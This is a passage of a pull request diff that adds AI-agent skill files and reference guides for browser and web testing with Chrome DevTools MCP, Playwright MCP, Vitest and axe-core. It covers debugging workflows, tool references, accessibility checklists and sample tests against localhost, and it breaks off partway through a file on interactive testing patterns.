### PR TITLE
chore: add web testing skills and browser MCP servers

### DIFF
--- a/.agents/skills/browser-testing-with-devtools/SKILL.md
+++ b/.agents/skills/browser-testing-with-devtools/SKILL.md
@@ -1,0 +1,254 @@
+---
+name: browser-testing-with-devtools
+description: Use when building or debugging anything that runs in a browser. Use when you need to inspect the DOM, capture console errors, analyze network requests, profile performance, or verify visual output with real runtime data via Chrome DevTools MCP.
+---
+
+# Browser Testing with DevTools
+
+## Overview
+
+Use Chrome DevTools MCP to give your agent eyes into the browser. This bridges the gap between static code analysis and live browser execution — the agent can see what the user sees, inspect the DOM, read console logs, analyze network requests, and capture performance data. Instead of guessing what's happening at runtime, verify it.
+
+## When to Use
+
+- Building or modifying anything that renders in a browser
+- Debugging UI issues (layout, styling, interaction)
+- Diagnosing console errors or warnings
+- Analyzing network requests and API responses
+- Profiling performance (Core Web Vitals, paint timing, layout shifts)
+- Verifying that a fix actually works in the browser
+- Automated UI testing through the agent
+
+**When NOT to use:** Backend-only changes, CLI tools, or code that doesn't run in a browser.
+
+## Setting Up Chrome DevTools MCP
+
+### Installation
+
+```bash
+# Add Chrome DevTools MCP server to your Claude Code config
+# In your project's .mcp.json or Claude Code settings:
+{
+  "mcpServers": {
+    "chrome-devtools": {
+      "command": "npx",
+      "args": ["@anthropic/chrome-devtools-mcp@latest"]
+    }
+  }
+}
+```
+
+### Available Tools
+
+Chrome DevTools MCP provides these capabilities:
+
+| Tool | What It Does | When to Use |
+|------|-------------|-------------|
+| **Screenshot** | Captures the current page state | Visual verification, before/after comparisons |
+| **DOM Inspection** | Reads the live DOM tree | Verify component rendering, check structure |
+| **Console Logs** | Retrieves console output (log, warn, error) | Diagnose errors, verify logging |
+| **Network Monitor** | Captures network requests and responses | Verify API calls, check payloads |
+| **Performance Trace** | Records performance timing data | Profile load time, identify bottlenecks |
+| **Element Styles** | Reads computed styles for elements | Debug CSS issues, verify styling |
+| **Accessibility Tree** | Reads the accessibility tree | Verify screen reader experience |
+| **JavaScript Execution** | Runs JavaScript in the page context | Interactive debugging, state inspection |
+
+## The DevTools Debugging Workflow
+
+### For UI Bugs
+
+```
+1. REPRODUCE
+   └── Navigate to the page, trigger the bug
+       └── Take a screenshot to confirm visual state
+
+2. INSPECT
+   ├── Check console for errors or warnings
+   ├── Inspect the DOM element in question
+   ├── Read computed styles
+   └── Check the accessibility tree
+
+3. DIAGNOSE
+   ├── Compare actual DOM vs expected structure
+   ├── Compare actual styles vs expected styles
+   ├── Check if the right data is reaching the component
+   └── Identify the root cause (HTML? CSS? JS? Data?)
+
+4. FIX
+   └── Implement the fix in source code
+
+5. VERIFY
+   ├── Reload the page
+   ├── Take a screenshot (compare with Step 1)
+   ├── Confirm console is clean
+   └── Run automated tests
+```
+
+### For Network Issues
+
+```
+1. CAPTURE
+   └── Open network monitor, trigger the action
+
+2. ANALYZE
+   ├── Check request URL, method, and headers
+   ├── Verify request payload matches expectations
+   ├── Check response status code
+   ├── Inspect response body
+   └── Check timing (is it slow? is it timing out?)
+
+3. DIAGNOSE
+   ├── 4xx → Client is sending wrong data or wrong URL
+   ├── 5xx → Server error (check server logs)
+   ├── CORS → Check origin headers and server config
+   ├── Timeout → Check server response time / payload size
+   └── Missing request → Check if the code is actually sending it
+
+4. FIX & VERIFY
+   └── Fix the issue, replay the action, confirm the response
+```
+
+### For Performance Issues
+
+```
+1. BASELINE
+   └── Record a performance trace of the current behavior
+
+2. IDENTIFY
+   ├── Check Largest Contentful Paint (LCP)
+   ├── Check Cumulative Layout Shift (CLS)
+   ├── Check Interaction to Next Paint (INP)
+   ├── Identify long tasks (> 50ms)
+   └── Check for unnecessary re-renders
+
+3. FIX
+   └── Address the specific bottleneck
+
+4. MEASURE
+   └── Record another trace, compare with baseline
+```
+
+## Writing Test Plans for Complex UI Bugs
+
+For complex UI issues, write a structured test plan the agent can follow in the browser:
+
+```markdown
+## Test Plan: Task completion animation bug
+
+### Setup
+1. Navigate to http://localhost:3000/tasks
+2. Ensure at least 3 tasks exist
+
+### Steps
+1. Click the checkbox on the first task
+   - Expected: Task shows strikethrough animation, moves to "completed" section
+   - Check: Console should have no errors
+   - Check: Network should show PATCH /api/tasks/:id with { status: "completed" }
+
+2. Click undo within 3 seconds
+   - Expected: Task returns to active list with reverse animation
+   - Check: Console should have no errors
+   - Check: Network should show PATCH /api/tasks/:id with { status: "pending" }
+
+3. Rapidly toggle the same task 5 times
+   - Expected: No visual glitches, final state is consistent
+   - Check: No console errors, no duplicate network requests
+   - Check: DOM should show exactly one instance of the task
+
+### Verification
+- [ ] All steps completed without console errors
+- [ ] Network requests are correct and not duplicated
+- [ ] Visual state matches expected behavior
+- [ ] Accessibility: task status changes are announced to screen readers
+```
+
+## Screenshot-Based Verification
+
+Use screenshots for visual regression testing:
+
+```
+1. Take a "before" screenshot
+2. Make the code change
+3. Reload the page
+4. Take an "after" screenshot
+5. Compare: does the change look correct?
+```
+
+This is especially valuable for:
+- CSS changes (layout, spacing, colors)
+- Responsive design at different viewport sizes
+- Loading states and transitions
+- Empty states and error states
+
+## Console Analysis Patterns
+
+### What to Look For
+
+```
+ERROR level:
+  ├── Uncaught exceptions → Bug in code
+  ├── Failed network requests → API or CORS issue
+  ├── React/Vue warnings → Component issues
+  └── Security warnings → CSP, mixed content
+
+WARN level:
+  ├── Deprecation warnings → Future compatibility issues
+  ├── Performance warnings → Potential bottleneck
+  └── Accessibility warnings → a11y issues
+
+LOG level:
+  └── Debug output → Verify application state and flow
+```
+
+### Clean Console Standard
+
+A production-quality page should have **zero** console errors and warnings. If the console isn't clean, fix the warnings before shipping.
+
+## Accessibility Verification with DevTools
+
+```
+1. Read the accessibility tree
+   └── Confirm all interactive elements have accessible names
+
+2. Check heading hierarchy
+   └── h1 → h2 → h3 (no skipped levels)
+
+3. Check focus order
+   └── Tab through the page, verify logical sequence
+
+4. Check color contrast
+   └── Verify text meets 4.5:1 minimum ratio
+
+5. Check dynamic content
+   └── Verify ARIA live regions announce changes
+```
+
+## Common Rationalizations
+
+| Rationalization | Reality |
+|---|---|
+| "It looks right in my mental model" | Runtime behavior regularly differs from what code suggests. Verify with actual browser state. |
+| "Console warnings are fine" | Warnings become errors. Clean consoles catch bugs early. |
+| "I'll check the browser manually later" | DevTools MCP lets the agent verify now, in the same session, automatically. |
+| "Performance profiling is overkill" | A 1-second performance trace catches issues that hours of code review miss. |
+| "The DOM must be correct if the tests pass" | Unit tests don't test CSS, layout, or real browser rendering. DevTools does. |
+
+## Red Flags
+
+- Shipping UI changes without viewing them in a browser
+- Console errors ignored as "known issues"
+- Network failures not investigated
+- Performance never measured, only assumed
+- Accessibility tree never inspected
+- Screenshots never compared before/after changes
+
+## Verification
+
+After any browser-facing change:
+
+- [ ] Page loads without console errors or warnings
+- [ ] Network requests return expected status codes and data
+- [ ] Visual output matches the spec (screenshot verification)
+- [ ] Accessibility tree shows correct structure and labels
+- [ ] Performance metrics are within acceptable ranges
+- [ ] All DevTools findings are addressed before marking complete

--- a/.agents/skills/playwright-mcp/SKILL.md
+++ b/.agents/skills/playwright-mcp/SKILL.md
@@ -1,0 +1,223 @@
+---
+name: playwright-mcp
+description: "Live browser interaction via Playwright MCP — navigate pages, click buttons, fill forms, take screenshots."
+metadata:
+  version: 1.0.0
+  mcp-server: playwright
+---
+
+# Playwright MCP Browser Automation
+
+You are an expert at using the Playwright MCP server for live browser interaction. This skill teaches you to navigate pages, inspect elements, fill forms, and debug web UIs through direct browser control.
+
+## Critical: These Are Direct Tool Calls
+
+MCP tools are **direct tool calls** — exactly like `Read`, `Grep`, or `Bash`. They are NOT CLI commands.
+
+**CORRECT** — call the tool directly:
+```
+Tool: mcp__playwright__browser_navigate
+Parameters: { "url": "http://localhost:3010" }
+```
+
+**WRONG** — do NOT shell out:
+```
+Bash: claude mcp call playwright browser_navigate ...  # This does not work
+```
+
+All Playwright MCP tools use the `mcp__playwright__` prefix.
+
+## Critical: Always Snapshot Before Interacting
+
+`browser_snapshot` returns an accessibility tree with `ref` values for every interactive element. You **must** snapshot before clicking, typing, or hovering — the `ref` values are required for all interaction tools.
+
+## Critical: Output Size Awareness
+
+| Tool | Output Size | Notes |
+|------|------------|-------|
+| `browser_snapshot` | Medium-Large | Full accessibility tree — scales with page complexity |
+| `browser_take_screenshot` | Large | Base64 image — use sparingly |
+| `browser_console_messages` | Variable | Can be very large on noisy apps |
+| `browser_network_requests` | Variable | Can be very large on API-heavy pages |
+| `browser_navigate` | Small | Returns page title only |
+| `browser_click` | Small | Returns snapshot after click |
+| `browser_type` | Small | Returns snapshot after typing |
+
+Prefer `browser_snapshot` over `browser_take_screenshot` for understanding page structure. Screenshots are for visual verification only.
+
+## Workflow 1: Navigate & Inspect
+
+**Trigger:** User says "open this page", "what's on the page?", "inspect the UI", "check the layout"
+
+### Steps
+
+1. **Navigate to the page:**
+   ```
+   browser_navigate({ url: "http://localhost:3010/home/team-slug/settings" })
+   ```
+
+2. **Get page structure** (always do this before interacting):
+   ```
+   browser_snapshot → accessibility tree with ref values for all elements
+   ```
+
+3. **Analyze the snapshot:** Identify interactive elements (buttons, links, inputs) by their `ref` values. Report page structure to user.
+
+### Decision: Snapshot vs Screenshot
+
+| Need | Use |
+|------|-----|
+| Understand page structure, find elements | `browser_snapshot` (structured, has `ref` values) |
+| Visual appearance, layout bugs, CSS issues | `browser_take_screenshot` (visual image) |
+| Both structure and appearance | Snapshot first, then screenshot if visual check needed |
+
+## Workflow 2: Form Interaction
+
+**Trigger:** User says "fill out the form", "submit the login", "type in the field", "select an option"
+
+### Steps
+
+1. **Snapshot to find form fields:**
+   ```
+   browser_snapshot → identify input refs and their labels
+   ```
+
+2. **Fill fields** (choose based on complexity):
+   - **Single field:** `browser_type({ ref: "input-ref", text: "value" })`
+   - **Multiple fields:** `browser_fill_form({ fields: [{ ref: "ref1", value: "val1" }, { ref: "ref2", value: "val2" }] })`
+   - **Dropdown:** `browser_select_option({ ref: "select-ref", values: ["option-value"] })`
+
+3. **Submit the form:**
+   ```
+   browser_click({ ref: "submit-button-ref" })
+   ```
+
+4. **Verify result:**
+   ```
+   browser_snapshot → check for success message, error states, or navigation
+   ```
+
+### Key Patterns
+
+- `browser_fill_form` is faster than multiple `browser_type` calls for multi-field forms
+- Use `browser_press_key({ key: "Enter" })` as alternative to clicking submit
+- After submission, wait if needed: `browser_wait_for({ text: "Success" })` then snapshot
+
+## Workflow 3: Debug Investigation
+
+**Trigger:** User says "debug the page", "check for errors", "what API calls are happening?", "why isn't it working?"
+
+### Steps
+
+1. **Navigate to the problematic page:**
+   ```
+   browser_navigate({ url: "..." })
+   ```
+
+2. **Run these in parallel** (they are independent):
+   ```
+   browser_console_messages → JavaScript errors, warnings, logs
+   browser_network_requests → API calls, failed requests, status codes
+   ```
+
+3. **Snapshot the page:**
+   ```
+   browser_snapshot → current UI state, error messages, loading states
+   ```
+
+4. **Investigate further:**
+   ```
+   browser_evaluate({ expression: "document.querySelectorAll('.error').length" }) → run custom JS
+   ```
+
+## Workflow 4: Multi-Step Navigation
+
+**Trigger:** User says "go through the flow", "test the signup process", "walk through the wizard"
+
+### Steps
+
+1. **Navigate to starting page:**
+   ```
+   browser_navigate({ url: "..." })
+   ```
+
+2. **For each step:**
+   ```
+   browser_snapshot → find the next action
+   browser_click({ ref: "..." }) or browser_type({ ref: "...", text: "..." })
+   browser_wait_for({ text: "expected content" }) → if page loads async
+   ```
+
+3. **Handle dialogs if they appear:**
+   ```
+   browser_handle_dialog({ accept: true }) → confirm/alert/prompt
+   ```
+
+4. **Go back if needed:**
+   ```
+   browser_navigate_back
+   ```
+
+## Tool Reference
+
+### Navigation
+| Tool | Purpose | Parameters |
+|------|---------|------------|
+| `browser_navigate` | Go to URL | `url` (required) |
+| `browser_navigate_back` | Go back | None |
+| `browser_wait_for` | Wait for text or time | `text` or `timeout` (ms) |
+| `browser_tabs` | List/switch tabs | None or `index` to switch |
+
+### Inspection
+| Tool | Purpose | Parameters |
+|------|---------|------------|
+| `browser_snapshot` | Accessibility tree with refs | None |
+| `browser_take_screenshot` | Visual screenshot | None |
+| `browser_console_messages` | JS console output | None |
+| `browser_network_requests` | Network activity | None |
+
+### Interaction
+| Tool | Purpose | Parameters |
+|------|---------|------------|
+| `browser_click` | Click element | `ref` (from snapshot) |
+| `browser_type` | Type text | `ref`, `text` |
+| `browser_fill_form` | Fill multiple fields | `fields` array of `{ ref, value }` |
+| `browser_select_option` | Select dropdown | `ref`, `values` array |
+| `browser_hover` | Hover element | `ref` |
+| `browser_drag` | Drag and drop | `startRef`, `endRef` |
+| `browser_press_key` | Keyboard input | `key` (e.g., "Enter", "Tab") |
+| `browser_file_upload` | Upload file | `ref`, `paths` array |
+| `browser_handle_dialog` | Confirm/dismiss dialog | `accept` boolean |
+
+### Advanced
+| Tool | Purpose | Parameters |
+|------|---------|------------|
+| `browser_evaluate` | Run JavaScript | `expression` |
+| `browser_resize` | Resize viewport | `width`, `height` |
+| `browser_close` | Close page | None |
+| `browser_install` | Install browser | None |
+| `browser_run_code` | Run Playwright code | `code` string |
+
+## Troubleshooting
+
+### "No browser running" or Connection Errors
+
+The Playwright MCP server manages its own browser instance. If tools fail:
+1. Try `browser_install` to ensure the browser binary is available
+2. Try `browser_navigate` to a simple URL — this may initialize the browser
+
+### Elements Not Found After Navigation
+
+Pages with async content may not have rendered yet:
+1. Use `browser_wait_for({ text: "expected content" })` before snapshot
+2. Use `browser_wait_for({ timeout: 2000 })` for time-based waiting
+
+### Proxied or Internal Domains
+
+The MCP browser cannot reach proxied or internal domains that require network tunnels. Use `http://127.0.0.1:54321` directly for local Supabase.
+
+### Snapshot Returns Very Large Output
+
+Complex pages produce large accessibility trees. If output is too large:
+1. Navigate to a specific sub-page rather than the full app
+2. Use `browser_evaluate` to query specific elements instead

--- a/.agents/skills/web-testing/SKILL.md
+++ b/.agents/skills/web-testing/SKILL.md
@@ -1,0 +1,87 @@
+---
+name: web-testing
+description: Web testing with Playwright, Vitest, k6. E2E/unit/integration/load/security/visual/a11y testing. Use for test automation, flakiness, Core Web Vitals, mobile gestures, cross-browser.
+license: Apache-2.0
+version: 2.0.0
+---
+
+# Web Testing Skill
+
+Comprehensive web testing: unit, integration, E2E, load, security, visual regression, accessibility.
+
+## Quick Start
+
+```bash
+npx vitest run                    # Unit tests
+npx playwright test               # E2E tests
+npx playwright test --ui          # E2E with UI
+k6 run load-test.js               # Load tests
+npx @axe-core/cli https://example.com  # Accessibility
+npx lighthouse https://example.com     # Performance
+```
+
+## Testing Pyramid (70-20-10)
+
+| Layer | Ratio | Framework | Speed |
+|-------|-------|-----------|-------|
+| Unit | 70% | Vitest/Jest | <50ms |
+| Integration | 20% | Vitest + fixtures | 100-500ms |
+| E2E | 10% | Playwright | 5-30s |
+
+## When to Use
+
+- **Unit**: Functions, utilities, state logic
+- **Integration**: API endpoints, database ops, modules
+- **E2E**: Critical flows (login, checkout, payment)
+- **Load**: Pre-release performance validation
+- **Security**: Pre-deploy vulnerability scanning
+- **Visual**: UI regression detection
+
+## Reference Documentation
+
+### Core Testing
+- `./references/unit-integration-testing.md` - Unit/integration patterns
+- `./references/e2e-testing-playwright.md` - Playwright E2E workflows
+- `./references/component-testing.md` - React/Vue/Angular component testing
+- `./references/testing-pyramid-strategy.md` - Test ratios, priority matrix
+
+### Cross-Browser & Mobile
+- `./references/cross-browser-checklist.md` - Browser/device matrix
+- `./references/mobile-gesture-testing.md` - Touch, swipe, orientation
+- `./references/shadow-dom-testing.md` - Web components testing
+
+### Interactive & Forms
+- `./references/interactive-testing-patterns.md` - Forms, keyboard, drag-drop
+- `./references/functional-testing-checklist.md` - Feature testing
+
+### Performance & Quality
+- `./references/performance-core-web-vitals.md` - LCP/CLS/INP, Lighthouse CI
+- `./references/visual-regression.md` - Screenshot comparison
+- `./references/test-flakiness-mitigation.md` - Stability strategies
+
+### Accessibility
+- `./references/accessibility-testing.md` - WCAG checklist, axe-core
+
+### Security
+- `./references/security-testing-overview.md` - OWASP Top 10, tools
+- `./references/security-checklists.md` - Auth, API, headers
+- `./references/vulnerability-payloads.md` - SQL/XSS/CSRF payloads
+
+### API & Load
+- `./references/api-testing.md` - API test patterns
+- `./references/load-testing-k6.md` - k6 load test patterns
+
+### Checklists
+- `./references/pre-release-checklist.md` - Complete release checklist
+
+## CI/CD Integration
+
+```yaml
+jobs:
+  test:
+    steps:
+      - run: npm run test:unit      # Gate 1: Fast fail
+      - run: npm run test:e2e       # Gate 2: After unit pass
+      - run: npm run test:a11y      # Accessibility
+      - run: npx lhci autorun       # Performance
+```

--- a/.agents/skills/web-testing/references/accessibility-testing.md
+++ b/.agents/skills/web-testing/references/accessibility-testing.md
@@ -1,0 +1,84 @@
+# Accessibility Testing (a11y)
+
+## WCAG 2.1 AA Checklist
+
+### Perceivable
+- [ ] Images have meaningful alt text
+- [ ] Color not sole conveyance method
+- [ ] Contrast ratio 4.5:1 (text)
+- [ ] Text resizable to 200%
+
+### Operable
+- [ ] All functions keyboard accessible
+- [ ] Visible focus indicators
+- [ ] Skip navigation links
+- [ ] No keyboard traps
+
+### Understandable
+- [ ] Language attribute set
+- [ ] Labels for form inputs
+- [ ] Error messages clear
+
+### Robust
+- [ ] Valid HTML
+- [ ] ARIA landmarks correct
+
+## Playwright + axe-core
+
+```typescript
+import { test, expect } from '@playwright/test';
+import AxeBuilder from '@axe-core/playwright';
+
+test('page is accessible', async ({ page }) => {
+  await page.goto('http://localhost:3000');
+  const results = await new AxeBuilder({ page }).analyze();
+  expect(results.violations).toEqual([]);
+});
+
+test('WCAG AA compliant', async ({ page }) => {
+  await page.goto('http://localhost:3000');
+  const results = await new AxeBuilder({ page })
+    .withTags(['wcag2aa'])
+    .analyze();
+  expect(results.violations).toEqual([]);
+});
+```
+
+## Component Testing (Jest)
+
+```typescript
+import { axe, toHaveNoViolations } from 'jest-axe';
+expect.extend(toHaveNoViolations);
+
+test('Button accessible', async () => {
+  const { container } = render(<Button>Click</Button>);
+  expect(await axe(container)).toHaveNoViolations();
+});
+```
+
+## Manual Testing
+
+- [ ] Tab through all interactive elements
+- [ ] Shift+Tab navigates backward
+- [ ] Enter/Space activates buttons
+- [ ] Escape closes modals
+- [ ] Screen reader announces content
+
+## CLI Tools
+
+```bash
+npx @axe-core/cli https://example.com
+npx lighthouse https://example.com --only-categories=accessibility
+npx pa11y https://example.com
+```
+
+## CI Integration
+
+```yaml
+- name: Accessibility Tests
+  run: npx playwright test --grep @a11y
+```
+
+## Resources
+- axe rules: https://dequeuniversity.com/rules/axe/
+- WCAG checklist: https://www.a11yproject.com/checklist/

--- a/.agents/skills/web-testing/references/api-testing.md
+++ b/.agents/skills/web-testing/references/api-testing.md
@@ -1,0 +1,78 @@
+# API Testing
+
+## Supertest (Jest/Vitest)
+
+```javascript
+import request from 'supertest';
+import app from './app';
+
+describe('POST /users', () => {
+  it('creates user with valid data', async () => {
+    const res = await request(app)
+      .post('/users')
+      .send({ email: 'test@example.com', password: 'secret123' });
+
+    expect(res.status).toBe(201);
+    expect(res.body.id).toBeDefined();
+  });
+
+  it('rejects duplicate email', async () => {
+    await request(app).post('/users').send({ email: 'dup@example.com' });
+    const res = await request(app).post('/users').send({ email: 'dup@example.com' });
+    expect(res.status).toBe(409);
+  });
+
+  it('requires authentication', async () => {
+    const res = await request(app).get('/protected');
+    expect(res.status).toBe(401);
+  });
+});
+```
+
+## API Checklist
+
+### Authentication
+- [ ] Valid credentials return 200 + token
+- [ ] Invalid credentials return 401
+- [ ] Missing/expired token returns 401
+
+### Authorization
+- [ ] User accesses own resources
+- [ ] Cannot access others' resources (403)
+
+### Input Validation
+- [ ] Missing required fields → 400
+- [ ] Invalid types → 400
+- [ ] SQL/XSS payloads rejected
+
+### Response
+- [ ] Correct status codes
+- [ ] Schema matches docs
+- [ ] Error messages helpful
+
+### Rate Limiting
+- [ ] Rate limit headers present
+- [ ] 429 when limit exceeded
+
+## Postman Tests
+
+```javascript
+pm.test("Status 200", () => pm.response.to.have.status(200));
+pm.test("Has user ID", () => {
+  pm.expect(pm.response.json().id).to.be.a('number');
+});
+```
+
+## GraphQL Testing
+
+```typescript
+const query = `query { users { id email } }`;
+const res = await request(app).post('/graphql').send({ query });
+expect(res.body.data.users).toHaveLength(2);
+```
+
+## Contract Testing
+
+```bash
+npx dredd api.yaml http://localhost:3000
+```

--- a/.agents/skills/web-testing/references/component-testing.md
+++ b/.agents/skills/web-testing/references/component-testing.md
@@ -1,0 +1,94 @@
+# Component Testing
+
+## Philosophy: Test Behavior, Not Implementation
+
+```javascript
+// BAD: Tests internals
+expect(component.state.isOpen).toBe(true);
+
+// GOOD: Tests user-visible behavior
+await userEvent.click(getByRole('button', { name: 'Open' }));
+expect(getByRole('dialog')).toBeVisible();
+```
+
+## React Testing Library
+
+```javascript
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+
+test('form submission', async () => {
+  render(<LoginForm />);
+  await userEvent.type(screen.getByLabelText('Email'), 'test@example.com');
+  await userEvent.type(screen.getByLabelText('Password'), 'secret123');
+  await userEvent.click(screen.getByRole('button', { name: /login/i }));
+  expect(screen.getByText('Login successful')).toBeInTheDocument();
+});
+```
+
+## Vue Test Utils
+
+```javascript
+import { mount } from '@vue/test-utils';
+
+test('form submission', async () => {
+  const wrapper = mount(LoginForm);
+  await wrapper.find('input[type="email"]').setValue('test@example.com');
+  await wrapper.find('button').trigger('click');
+  expect(wrapper.text()).toContain('Login successful');
+});
+```
+
+## Angular Testing Library
+
+```typescript
+import { render, screen } from '@testing-library/angular';
+import userEvent from '@testing-library/user-event';
+
+test('form submission', async () => {
+  await render(LoginFormComponent);
+  const user = userEvent.setup();
+  await user.type(screen.getByLabelText('Email'), 'test@example.com');
+  await user.click(screen.getByRole('button', { name: /login/i }));
+  expect(screen.getByText('Login successful')).toBeInTheDocument();
+});
+```
+
+## Query Priority (Accessibility-First)
+
+1. `getByRole` - buttons, links, headings
+2. `getByLabelText` - form fields
+3. `getByPlaceholderText` - inputs
+4. `getByText` - non-interactive elements
+5. `getByTestId` - last resort
+
+## Async Patterns
+
+```javascript
+await screen.findByText('Loaded');
+await waitForElementToBeRemoved(() => screen.queryByText('Loading'));
+await waitFor(() => expect(screen.getByText('Done')).toBeInTheDocument());
+```
+
+## Mocking
+
+```javascript
+vi.mock('./api', () => ({
+  fetchUser: vi.fn().mockResolvedValue({ name: 'John' })
+}));
+
+render(
+  <UserContext.Provider value={{ user: mockUser }}>
+    <Profile />
+  </UserContext.Provider>
+);
+```
+
+## Vitest Browser Mode
+
+```typescript
+// vitest.config.ts - more accurate than jsdom
+export default defineConfig({
+  test: { browser: { enabled: true, name: 'chromium', provider: 'playwright' } },
+});
+```

--- a/.agents/skills/web-testing/references/cross-browser-checklist.md
+++ b/.agents/skills/web-testing/references/cross-browser-checklist.md
@@ -1,0 +1,72 @@
+# Cross-Browser & Responsive Testing
+
+## Browser Coverage
+
+| Browser | Priority |
+|---------|----------|
+| Chrome | Mandatory |
+| Safari | Mandatory (mobile) |
+| Edge | Mandatory |
+| Firefox | Recommended |
+
+## Device Breakpoints
+
+| Device | Viewport | Priority |
+|--------|----------|----------|
+| Mobile S | 320px | High |
+| Mobile M | 375px | High |
+| Tablet | 768px | High |
+| Laptop | 1024px | High |
+| Desktop | 1440px | High |
+
+## Playwright Config
+
+```typescript
+import { devices } from '@playwright/test';
+
+export default defineConfig({
+  projects: [
+    { name: 'chromium', use: { ...devices['Desktop Chrome'] } },
+    { name: 'firefox', use: { ...devices['Desktop Firefox'] } },
+    { name: 'webkit', use: { ...devices['Desktop Safari'] } },
+    { name: 'mobile-chrome', use: { ...devices['Pixel 5'] } },
+    { name: 'mobile-safari', use: { ...devices['iPhone 12'] } },
+  ],
+});
+```
+
+## Responsive Checklist
+
+### Layout
+- [ ] Content reflows at all breakpoints
+- [ ] No horizontal scrolling on mobile
+- [ ] Navigation transforms to mobile menu
+- [ ] Touch targets 44px minimum
+
+### Forms
+- [ ] Input fields usable on mobile
+- [ ] Touch keyboard doesn't obscure inputs
+- [ ] Date pickers mobile-friendly
+
+### Interactive
+- [ ] Hover states have touch alternatives
+- [ ] Modals size appropriate per device
+
+## Browser-Specific Issues
+
+- **Safari**: flexbox gap, date input, WebP
+- **Firefox**: CSS grid subgrid, custom scrollbars
+- **Edge**: Same as Chromium (verify anyway)
+
+## Commands
+
+```bash
+npx playwright test --project=chromium
+npx playwright test --project=mobile-chrome --project=mobile-safari
+```
+
+## Testing Services
+
+- **BrowserStack**: Real device cloud
+- **Sauce Labs**: Cross-browser cloud
+- **Playwright**: Local emulation (free)

--- a/.agents/skills/web-testing/references/e2e-testing-playwright.md
+++ b/.agents/skills/web-testing/references/e2e-testing-playwright.md
@@ -1,0 +1,87 @@
+# E2E Testing with Playwright
+
+## Setup
+
+```bash
+npm init playwright@latest
+npx playwright install
+```
+
+## Test Structure
+
+```typescript
+import { test, expect } from '@playwright/test';
+
+test.describe('User Login', () => {
+  test('should login successfully', async ({ page }) => {
+    await page.goto('http://localhost:3000/login');
+    await page.fill('input[name="email"]', 'user@example.com');
+    await page.fill('input[name="password"]', 'password123');
+    await page.click('button:text("Login")');
+    await page.waitForURL('/dashboard');
+    await expect(page.locator('h1')).toContainText('Dashboard');
+  });
+});
+```
+
+## Selector Strategies
+
+```typescript
+// Preferred (accessibility-first)
+await page.getByRole('button', { name: 'Submit' }).click();
+await page.getByLabel('Email').fill('user@example.com');
+
+// Fallback
+await page.locator('[data-testid="submit-btn"]').click();
+```
+
+## Common Patterns
+
+### Wait for API
+```typescript
+const responsePromise = page.waitForResponse('**/api/users');
+await page.click('button:text("Load")');
+await responsePromise;
+```
+
+### Mock API
+```typescript
+await page.route('**/api/users', route =>
+  route.fulfill({ status: 200, body: JSON.stringify([]) })
+);
+```
+
+## Configuration
+
+```typescript
+export default defineConfig({
+  workers: process.env.CI ? 2 : undefined,
+  fullyParallel: true,
+  use: {
+    screenshot: 'only-on-failure',
+    trace: 'on-first-retry',
+  },
+});
+```
+
+## Commands
+
+```bash
+npx playwright test                    # Run all
+npx playwright test --ui               # UI mode
+npx playwright test login.spec.ts      # Specific file
+npx playwright codegen https://example.com  # Generate
+npx playwright show-report             # View report
+```
+
+## CI/CD
+
+```yaml
+- run: npx playwright install --with-deps
+- run: npx playwright test
+- uses: actions/upload-artifact@v4
+  if: failure()
+  with:
+    name: playwright-report
+    path: playwright-report/
+```

--- a/.agents/skills/web-testing/references/functional-testing-checklist.md
+++ b/.agents/skills/web-testing/references/functional-testing-checklist.md
@@ -1,0 +1,88 @@
+# Functional Testing Checklist
+
+## Core Features
+
+- [ ] Primary user workflows execute end-to-end
+- [ ] CRUD operations work (create, read, update, delete)
+- [ ] Error states handled gracefully
+- [ ] Validation rules enforced (email, phone, dates)
+- [ ] Search/filter functions correctly
+- [ ] Sorting works in both directions
+- [ ] Pagination displays correct data
+
+## User Workflows
+
+- [ ] Signup flow completes successfully
+- [ ] Login flow works with valid credentials
+- [ ] Password reset flow sends email and resets
+- [ ] Multi-step forms retain data between steps
+- [ ] Data persists after page refresh/navigation
+- [ ] Logout clears session completely
+- [ ] Deep links work correctly
+
+## Business Logic
+
+- [ ] Calculations correct (totals, discounts, taxes)
+- [ ] Rules enforced (age verification, region restrictions)
+- [ ] Edge cases handled (zero, negative, max values)
+- [ ] Date/time operations account for timezones
+- [ ] Currency formatting correct
+- [ ] Quantity limits enforced
+
+## Form Validation
+
+- [ ] Required fields show error when empty
+- [ ] Email format validation works
+- [ ] Password strength requirements shown
+- [ ] Phone number format accepted
+- [ ] Date picker prevents invalid dates
+- [ ] File upload validates type/size
+- [ ] Form submits only when valid
+
+## Integration Points
+
+- [ ] API calls succeed with correct parameters
+- [ ] Database operations persist
+- [ ] Third-party integrations work (payment, auth)
+- [ ] Error responses handled gracefully
+- [ ] Loading states displayed during async ops
+- [ ] Timeout handling for slow responses
+- [ ] Retry logic works on failures
+
+## Error Handling
+
+- [ ] Network errors show retry option
+- [ ] Invalid input shows helpful message
+- [ ] 401 errors trigger re-authentication
+- [ ] 403 errors show access denied
+- [ ] 404 errors show not found page
+- [ ] 500 errors logged, user sees friendly message
+- [ ] Validation errors highlight specific fields
+
+## State Management
+
+- [ ] URL reflects application state
+- [ ] Browser back/forward works correctly
+- [ ] Bookmarking preserves state
+- [ ] Shared links open correct view
+- [ ] State persists through refresh (when appropriate)
+
+## Test Priority Matrix
+
+| Priority | Category | Examples |
+|----------|----------|----------|
+| P0 (Critical) | Core flows | Signup, login, checkout, payment |
+| P1 (High) | Major features | Search, CRUD, navigation |
+| P2 (Medium) | Secondary features | Filters, sorting, pagination |
+| P3 (Low) | Edge cases | Empty states, max limits |
+
+## Test Data Checklist
+
+- [ ] Happy path data
+- [ ] Empty/null values
+- [ ] Boundary values (min, max)
+- [ ] Invalid data types
+- [ ] Unicode/special characters
+- [ ] Long strings
+- [ ] Whitespace (leading, trailing)
+- [ ] Duplicate data scenarios

--- a/.agents/skills/web-testing/references/interactive-testing-patterns.md
+++ b/.agents/skills/web-testing/references/interactive-testing-patterns.md
@@ -1,0 +1,89 @@
+# Interactive Testing Patterns
+
+## Form Testing
+
+```javascript
+// Text input validation
+test('validates email format', async ({ page }) => {
+  await page.fill('[name="email"]', 'invalid');
+  await page.click('button[type="submit"]');
+  await expect(page.locator('.error')).toContainText('Invalid email');
+});
+
+// Select dropdowns
+await page.selectOption('select#country', 'US');
+await page.selectOption('select#country', { label: 'United States' });
+await page.selectOption('select#tags', ['tag1', 'tag2']); // Multi-select
+
+// Checkboxes & radios
+await page.check('input[name="terms"]');
+await expect(page.locator('input[name="terms"]')).toBeChecked();
